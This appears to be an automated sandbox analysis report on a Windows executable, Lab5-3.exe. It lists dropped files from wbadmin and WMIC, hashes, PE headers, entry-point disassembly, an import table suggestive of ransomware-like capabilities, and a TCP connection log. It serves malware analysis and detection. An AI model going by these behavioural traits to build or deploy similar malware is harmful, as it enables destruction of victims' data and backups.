                                                                                                          Preview:.(..@...@...........................................!...............................(/...Z@u.............(......eJ......k..*"...Zb..................................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1..............................................................O............4..*"...........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.....(/...Z@u................................................................8.B..Z@u....19041.1.amd64fre.vb_release.191206-1406.....,.@..Z@u...............'"a.-....spp.pdb........./.@..Z@u....W.p.D.......]....vssapi.pdb........@..Z@u.....T.c..i.\.C.s"8@....vssvc.pdb.......-.@..Z@u.....\..Q....T*&.......udfs.pdb........0.@..Z@u......B..,`..9..4.....ifsutil.pdb.....-.@..Z@u....I:...S%9.`...'.R....uudf.pdb........1.@..Z@u...........1$OI"......wbengine.pdb............0.@..Z@u.....2.R.+..
                                                                                                          Process:C:\Windows\System32\wbadmin.exe
                                                                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\262Z@u"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30720
                                                                                                          Entropy (8bit):0.7375930362977854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bR9+/i60TXIDUzaeOekOIeFd1OeveMeIMkaJ4eseTVlqsC9:b+/i6y3gGnVass0
                                                                                                          MD5:51F7144B8A963F2CADAA6DB8A797386B
                                                                                                          SHA1:0B0E8E9D1210BF718D2082F69D39A0EC6B071320
                                                                                                          SHA-256:F0B3FDDD74D849DF2458C896B24A418985B24B0274A198900044C4DB1969972B
                                                                                                          SHA-512:E9A6BAD19532F62D22D091E3488DC776A0D2352E70C6524088B1FE2CF8C77C7C51C89367AFB9E4A94FF773188633BE1F20DA541646BE0E0BD53C14E85724E89C
                                                                                                          Malicious:false
                                                                                                          Preview:.(..@...@...........................................!...............................(/...Z@u.............(......eJ......k..*"...Zb..................................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1..............................................................O............4..*"...........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.....(/...Z@u................................................................8.B..Z@u....19041.1.amd64fre.vb_release.191206-1406.....,.@..Z@u...............'"a.-....spp.pdb........./.@..Z@u....W.p.D.......]....vssapi.pdb........@..Z@u.....T.c..i.\.C.s"8@....vssvc.pdb.......-.@..Z@u.....\..Q....T*&.......udfs.pdb........0.@..Z@u......B..,`..9..4.....ifsutil.pdb.....-.@..Z@u....I:...S%9.`...'.R....uudf.pdb........1.@..Z@u...........1$OI"......wbengine.pdb............0.@..Z@u.....2.R.+..
                                                                                                          Process:C:\Windows\System32\wbadmin.exe
                                                                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\262Z@u"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30720
                                                                                                          Entropy (8bit):0.7375930362977854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bR9+/i60TXIDUzaeOekOIeFd1OeveMeIMkaJ4eseTVlqsC9:b+/i6y3gGnVass0
                                                                                                          MD5:51F7144B8A963F2CADAA6DB8A797386B
                                                                                                          SHA1:0B0E8E9D1210BF718D2082F69D39A0EC6B071320
                                                                                                          SHA-256:F0B3FDDD74D849DF2458C896B24A418985B24B0274A198900044C4DB1969972B
                                                                                                          SHA-512:E9A6BAD19532F62D22D091E3488DC776A0D2352E70C6524088B1FE2CF8C77C7C51C89367AFB9E4A94FF773188633BE1F20DA541646BE0E0BD53C14E85724E89C
                                                                                                          Malicious:false
                                                                                                          Preview:.(..@...@...........................................!...............................(/...Z@u.............(......eJ......k..*"...Zb..................................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1..............................................................O............4..*"...........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.....(/...Z@u................................................................8.B..Z@u....19041.1.amd64fre.vb_release.191206-1406.....,.@..Z@u...............'"a.-....spp.pdb........./.@..Z@u....W.p.D.......]....vssapi.pdb........@..Z@u.....T.c..i.\.C.s"8@....vssvc.pdb.......-.@..Z@u.....\..Q....T*&.......udfs.pdb........0.@..Z@u......B..,`..9..4.....ifsutil.pdb.....-.@..Z@u....I:...S%9.`...'.R....uudf.pdb........1.@..Z@u...........1$OI"......wbengine.pdb............0.@..Z@u.....2.R.+..
                                                                                                          Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28
                                                                                                          Entropy (8bit):4.208966082694623
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:nLWGWNI3ov:nyGWNOov
                                                                                                          MD5:F2CE4C29DC78D5906090690C345EAF80
                                                                                                          SHA1:D12E3B86380F0DBEF4FBDFFE2CBFE2144FB7E9CD
                                                                                                          SHA-256:0356A869FC7E6495BAC33303B002935C317166D0EA5D403BE162573CF01055D8
                                                                                                          SHA-512:51F939C41710BC3A4E443CDAF33AAE614B043ACC2382A0C836049E34D2F51C8195FD149548752B33E4EDD4299548BB1957B89997FC640C837C9400D76FEA5B74
                                                                                                          Malicious:false
                                                                                                          Preview:No Instance(s) Available....
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.865644234929455
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:Lab5-3.exe
                                                                                                          File size:149'504 bytes
                                                                                                          MD5:69bec32d50744293e85606a5e8f80425
                                                                                                          SHA1:101b90ac7e0c2a8b570686c13dfa0e161ddd00e0
                                                                                                          SHA256:95739e350d7f2aca2c609768ee72ad67fcf05efca5c7ad8df3027c82b9c454cf
                                                                                                          SHA512:e01f976fcbfa67cfd6e97855d07350a27b67fcc825d4e813ac9d2f4e8f464bb4f8bbbbe58a26bc27e78fa15db0ee5271e8f041dd72f036c11964eb1c591b438f
                                                                                                          SSDEEP:3072:V6ZkRGjkBrmKmY99UpkD1/34bIpVSrtLmqc2LVMMqqD/h2LuTeONA5tIHVcH:IS9rLPPUpa3VVEtLXcCqqD/hOQnaMcH
                                                                                                          TLSH:38E31725F156E276C4E70BB07668CFF658E8A434232090F7DBED0A5C18E4BE16E37256
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u5...[...[...[..rZ...[.N.....[..}_...[..l....[...Z.o.[.4uR...[.4uX...[.4uY...[.Rich..[.................PE..L.....T_...........
                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                          Entrypoint:0x416e10
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5F548FDC [Sun Sep 6 07:29:32 2020 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:e9f710b579880d1b6ff748176eb620f1
                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr fs:[00000030h]
                                                                                                          sub esp, 00000390h
                                                                                                          test byte ptr [eax+68h], 00000070h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          je 00007FB2606C5A3Ah
                                                                                                          push 00000000h
                                                                                                          call dword ptr [0041B134h]
                                                                                                          call 00007FB2606C5590h
                                                                                                          push 00426948h
                                                                                                          call dword ptr [0041B2E4h]
                                                                                                          call 00007FB2606BE9A0h
                                                                                                          mov ebx, dword ptr [0041B138h]
                                                                                                          lea eax, dword ptr [ebp-38h]
                                                                                                          push eax
                                                                                                          push 00000000h
                                                                                                          push 00000000h
                                                                                                          push 0040F800h
                                                                                                          push 00000000h
                                                                                                          push 00000000h
                                                                                                          call ebx
                                                                                                          mov edi, dword ptr [0041B2E8h]
                                                                                                          cmp eax, FFFFFFFFh
                                                                                                          je 00007FB2606C5A3Bh
                                                                                                          push 00000000h
                                                                                                          push 00000000h
                                                                                                          push 00000011h
                                                                                                          push eax
                                                                                                          call edi
                                                                                                          push 000000C8h
                                                                                                          call dword ptr [0041B120h]
                                                                                                          call 00007FB2606C95B3h
                                                                                                          test eax, eax
                                                                                                          jne 00007FB2606C5AC9h
                                                                                                          lea ecx, dword ptr [ebp-2Ch]
                                                                                                          mov dword ptr [ebp-2Ch], eax
                                                                                                          call 00007FB2606C1220h
                                                                                                          cmp dword ptr [ebp-2Ch], 01h
                                                                                                          jne 00007FB2606C5A91h
                                                                                                          call dword ptr [0041B0E0h]
                                                                                                          cmp al, 05h
                                                                                                          je 00007FB2606C5A87h
                                                                                                          mov esi, dword ptr fs:[00000030h]
                                                                                                          lea eax, dword ptr [ebp-00000390h]
                                                                                                          push 00000208h
                                                                                                          push 00000000h
                                                                                                          push eax
                                                                                                          call 00007FB2606C1066h
                                                                                                          mov eax, dword ptr [esi+10h]
                                                                                                          add esp, 0Ch
                                                                                                          mov edx, dword ptr [eax+3Ch]
                                                                                                          mov ecx, edx
                                                                                                          call 00007FB2606C10B6h
                                                                                                          add eax, eax
                                                                                                          push eax
                                                                                                          push edx
                                                                                                          lea eax, dword ptr [ebp+00FFFC70h]
                                                                                                          Programming Language:
                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x23f700x12c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x380.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x19a5a0x19c00d282ab13a7ed038291ebcb361830096cFalse0.5009196753640777data6.503595691687736IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x1b0000xa4440xa60041b4a8ff28dfc1e35d11fda0c3b7161cFalse0.6074924698795181data6.858699193362039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x260000x24400x20061a1d0d72b8efbb6ade2837d50960342False0.556640625data4.593977658336991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          DLLImport
                                                                                                          NETAPI32.dllNetApiBufferFree, NetShareEnum
                                                                                                          IPHLPAPI.DLLGetAdaptersInfo
                                                                                                          WS2_32.dllWSAGetLastError, htons, connect, socket, inet_addr, WSAStartup, select, closesocket, __WSAFDIsSet, WSACleanup, ioctlsocket
                                                                                                          CRYPT32.dllCryptBinaryToStringA
                                                                                                          gdiplus.dllGdipGetImageEncodersSize, GdipDeleteGraphics, GdipDeleteStringFormat, GdipGetImageGraphicsContext, GdipDeleteFont, GdipCreateBitmapFromScan0, GdipSetStringFormatAlign, GdipSaveImageToFile, GdipCloneBrush, GdipDrawString, GdipFree, GdipDeleteBrush, GdipAlloc, GdipDisposeImage, GdipCreateLineBrushFromRect, GdipSetStringFormatLineAlign, GdipCreateFont, GdiplusStartup, GdipGetGenericFontFamilySansSerif, GdipCreateStringFormat, GdipDeleteFontFamily, GdipGetImageEncoders, GdipFillRectangle, GdipCreateFontFamilyFromName
                                                                                                          SHLWAPI.dllPathAddBackslashW, PathFindExtensionW, PathRemoveBackslashW, PathRemoveExtensionA, StrFormatByteSize64A, PathRemoveFileSpecW
                                                                                                          MPR.dllWNetCloseEnum, WNetOpenEnumW, WNetEnumResourceW, WNetGetConnectionW, WNetAddConnection2W
                                                                                                          ntdll.dllRtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlInitializeCriticalSection, NtSetInformationThread, NtAdjustPrivilegesToken, NtOpenProcessToken, NtQueryInformationToken, RtlGetAce, NtOpenProcess, RtlQueryInformationAcl, RtlAllocateAndInitializeSid, RtlAddAce, RtlLengthSid, NtClose, RtlAdjustPrivilege, RtlFreeSid, RtlAddAccessDeniedAce, NtSetInformationProcess, RtlCreateAcl, NtWaitForSingleObject, NtSetInformationFile, RtlDosPathNameToNtPathName_U, NtCreateIoCompletion, NtRemoveIoCompletion, NtQueryInformationFile, RtlInterlockedPushEntrySList, RtlInitializeSListHead, RtlInterlockedPopEntrySList, RtlInterlockedFlushSList, RtlInitUnicodeString, NtAllocateVirtualMemory, LdrEnumerateLoadedModules, RtlAcquirePebLock, RtlReleasePebLock
                                                                                                          msvcrt.dllmalloc, calloc, free
                                                                                                          KERNEL32.dllGetLocalTime, GetProcAddress, SetThreadUILanguage, GetConsoleMode, GetWindowsDirectoryW, GetCurrentProcess, GlobalFree, GlobalAlloc, ReadFile, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, GetModuleHandleA, SetProcessShutdownParameters, SetConsoleMode, WriteFile, GetConsoleWindow, SetConsoleTitleA, FindVolumeClose, SetVolumeMountPointW, FindFirstVolumeW, QueryDosDeviceW, GetVersion, CreateProcessA, lstrcmpiA, GetCurrentProcessId, MoveFileExW, Process32Next, CreateToolhelp32Snapshot, OpenProcess, GetUserDefaultUILanguage, TerminateProcess, GetSystemDefaultUILanguage, Process32First, LoadLibraryA, OpenMutexA, CreateMutexA, GetTickCount, Sleep, GetTempFileNameW, GetTempPathW, GetDriveTypeW, lstrcmpiW, ExitProcess, CreateThread, CloseHandle, DeleteFileW, GetDiskFreeSpaceExW, SetFileAttributesW, ExitThread, GetFileAttributesW, CreateFileW, FindClose, SetConsoleTextAttribute, WaitForMultipleObjects, FindNextFileW, FindFirstFileExW, GetLogicalDrives, AllocConsole, SetConsoleCtrlHandler
                                                                                                          USER32.dllwsprintfW, GetMessageW, GetSystemMenu, SystemParametersInfoW, DeleteMenu, wsprintfA, CharUpperA, SetWindowLongA, PeekMessageW, GetWindowLongA, wvsprintfA, RegisterHotKey, FlashWindow, SetLayeredWindowAttributes, EnableMenuItem, MessageBoxA, GetSystemMetrics, GetShellWindow, GetWindowThreadProcessId, IsWindowVisible, ShowWindow, CharLowerBuffW
                                                                                                          ADVAPI32.dllCloseServiceHandle, RegQueryValueExW, RegDeleteValueW, RegSetValueExA, RegSetValueExW, RegCreateKeyExA, RegQueryValueExA, OpenProcessToken, DuplicateToken, OpenThreadToken, GetTokenInformation, SetSecurityInfo, RegOpenKeyA, RegCloseKey, GetSecurityInfo, EnumDependentServicesA, SetThreadToken, OpenSCManagerA, ControlService, QueryServiceStatusEx, OpenServiceA, SetFileSecurityW, CryptAcquireContextW, SetSecurityDescriptorOwner, CryptGenRandom, LookupPrivilegeValueA, CreateWellKnownSid, CheckTokenMembership, InitializeSecurityDescriptor, CryptReleaseContext
                                                                                                          SHELL32.dllSHEmptyRecycleBinW, ShellExecuteW, SHGetFolderPathW, ShellExecuteExA, ShellExecuteExW, CommandLineToArgvW
                                                                                                          ole32.dllCoGetObject, CoUninitialize, CoInitializeEx
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Apr 26, 2024 23:38:29.232151985 CEST49678443192.168.2.4104.46.162.224
                                                                                                          Apr 26, 2024 23:38:29.607124090 CEST49675443192.168.2.4173.222.162.32
                                                                                                          Apr 26, 2024 23:38:39.231587887 CEST49675443192.168.2.4173.222.162.32
                                                                                                          Apr 26, 2024 23:38:45.410434961 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:45.410466909 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:45.410650969 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:45.410898924 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:45.410907030 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:45.803493977 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:45.860143900 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.085452080 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.085474968 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.086534023 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.086551905 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.087193966 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.116302013 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.116403103 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.159029961 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.159038067 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.200337887 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:47.683595896 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:47.683681011 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.684348106 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:47.690264940 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:47.690299988 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.957772970 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.964139938 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.967699051 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:47.984925032 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:47.984954119 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:47.985924959 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.161758900 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.208115101 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.288235903 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.288386106 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.303900957 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.306312084 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.306349993 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.306380987 CEST50245443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.306396008 CEST4435024523.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.373666048 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.373697042 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:48.373766899 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.374025106 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:48.374037027 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.406919956 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.407017946 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:49.408385992 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:49.408397913 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.409162045 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.416933060 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:49.464117050 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.654421091 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.654598951 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.664138079 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:49.669614077 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:52.877626896 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:52.877660990 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:52.877676964 CEST50246443192.168.2.423.202.106.101
                                                                                                          Apr 26, 2024 23:38:52.877684116 CEST4435024623.202.106.101192.168.2.4
                                                                                                          Apr 26, 2024 23:38:53.449445963 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:53.449472904 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:53.449601889 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:53.450958014 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:53.450970888 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.078564882 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.078681946 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:54.082200050 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:54.082207918 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.082499981 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.181915045 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:54.456383944 CEST49672443192.168.2.4173.222.162.32
                                                                                                          Apr 26, 2024 23:38:54.456424952 CEST44349672173.222.162.32192.168.2.4
                                                                                                          Apr 26, 2024 23:38:54.755202055 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:54.796159983 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.166883945 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.166939974 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.166960001 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.166997910 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.167017937 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.167037010 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.187824965 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:55.187855005 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.187896013 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.187926054 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.187942982 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.220166922 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.269965887 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:55.290010929 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:55.785660028 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.785723925 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:55.793035984 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:56.310551882 CEST50243443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:38:56.310566902 CEST44350243142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:38:56.789258003 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:56.789285898 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:38:56.789302111 CEST50247443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:38:56.789309978 CEST4435024720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:35.902720928 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:35.902792931 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:35.902884960 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:35.903418064 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:35.903450966 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:36.517612934 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:36.517735004 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:36.531054020 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:36.531090021 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:36.531316996 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:36.540056944 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:36.584116936 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137460947 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137485027 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137499094 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137578011 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:37.137609959 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137635946 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.137696028 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:37.141925097 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:37.141953945 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:37.141980886 CEST51267443192.168.2.420.114.59.183
                                                                                                          Apr 26, 2024 23:39:37.141994953 CEST4435126720.114.59.183192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.344085932 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:45.344122887 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.344259024 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:45.344888926 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:45.344902992 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.732850075 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.733115911 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:45.733128071 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.733439922 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.733716011 CEST51269443192.168.2.4142.250.217.228
                                                                                                          Apr 26, 2024 23:39:45.733778000 CEST44351269142.250.217.228192.168.2.4
                                                                                                          Apr 26, 2024 23:39:45.780231953 CEST51269443192.168.2.4142.250.217.228
